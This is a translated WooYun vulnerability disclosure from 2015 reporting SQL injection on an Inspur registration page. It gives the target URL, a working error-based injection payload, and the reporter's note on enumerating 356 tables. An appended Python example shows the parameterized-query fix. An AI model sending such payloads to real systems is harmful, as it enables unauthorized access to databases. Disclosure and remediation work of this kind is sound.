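Vulnerability summary

Bug ID: wooyun-2015-0147739

Title: Injection in an Inspur (浪潮) site

Vendor: Inspur (浪潮)

Author: 回锅肉

Submitted: 2015-10-19 12:28

Fixed: 2015-10-24 12:30

Disclosed: 2015-10-24 12:30

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: the vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org. For questions or help, contact [email protected]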


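Vulnerability details

Disclosure status:

2015-10-19: Details reported to the vendor, awaiting vendor response
2015-10-24: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

I'd really like to use the search feature

Details:

http://svqd.inspur.com/svqd/jsp/svqd/zhuce/zhuce.jsp
POST injection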
Payload: {"params":{"javaClass":"ParameterSet","map":{"gszcmc":"ddd' AND 7217=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(120)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7217=7217) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(107)+CHAR(113))) AND 'PvnL'='PvnL"},"length":1},"context":{"javaClass":"HashMap","map":{},"length":0}}
Database: svqd
[356 tables]
There is a lot of data. I'm afraid of getting a visit from the authorities, so I stopped here. Take care.

Proof of vulnerability:

1.png

2.png

Fix:

You're the professionals. Give me a high rank, please.
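
Added example, not part of the original report and not the vendor's code: the reported `gszcmc` value is passed to a lookup twice, once spliced into the SQL text and once as a bound parameter. The `registration` table, the function names and the use of SQLite in place of the site's database are assumptions made for illustration.

```python
import json
import sqlite3

# The gszcmc value from the report's "Payload:" line, split for readability.
REPORTED = (
    "ddd' AND 7217=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(120)+CHAR(118)"
    "+CHAR(113)+(SELECT (CASE WHEN (7217=7217) THEN CHAR(49) ELSE CHAR(48) END))"
    "+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(107)+CHAR(113))) AND 'PvnL'='PvnL"
)

def body(gszcmc):
    """Build the JSON envelope posted to zhuce.jsp (shape taken from the report)."""
    return json.dumps({
        "params": {"javaClass": "ParameterSet", "map": {"gszcmc": gszcmc}, "length": 1},
        "context": {"javaClass": "HashMap", "map": {}, "length": 0},
    })

def field(raw, name="gszcmc"):
    """Extract one string parameter; reject anything that is not a string."""
    value = json.loads(raw)["params"]["map"].get(name)
    if not isinstance(value, str):
        raise ValueError(f"{name} must be a string")
    return value

def make_db():
    db = sqlite3.connect(":memory:")  # assumption: SQLite stands in for the real DB
    db.execute("CREATE TABLE registration (gszcmc TEXT)")  # hypothetical table
    db.execute("INSERT INTO registration VALUES ('ddd')")
    return db

def lookup_concat(db, name):
    # Vulnerable pattern: the value becomes part of the SQL text.
    sql = "SELECT gszcmc FROM registration WHERE gszcmc = '" + name + "'"
    return db.execute(sql).fetchall()

def lookup_bound(db, name):
    # Hardened pattern: the value travels as a bound parameter, never as SQL.
    return db.execute("SELECT gszcmc FROM registration WHERE gszcmc = ?", (name,)).fetchall()

def outcome(lookup, raw):
    """Return ('rows', [...]) or ('sql-error', msg) for one request body."""
    try:
        return ("rows", lookup(make_db(), field(raw)))
    except sqlite3.OperationalError as exc:
        # The database tried to compile request-supplied text as SQL.
        return ("sql-error", str(exc))

if __name__ == "__main__":
    for fn in (lookup_concat, lookup_bound):
        print(fn.__name__, outcome(fn, body("ddd")), outcome(fn, body(REPORTED)))
```

With the concatenated query the database reports a compile error, because the injected expression is parsed as SQL; with the bound parameter the same string is only a name that matches no row. In a JSP backend the equivalent of `lookup_bound` is a `java.sql.PreparedStatement` with a `?` placeholder.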

Copyright notice: when reposting, please credit the source 回锅肉@乌云


Vulnerability response

Vendor response:

Severity: no impact, ignored by vendor

Ignored at: 2015-10-24 12:30

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None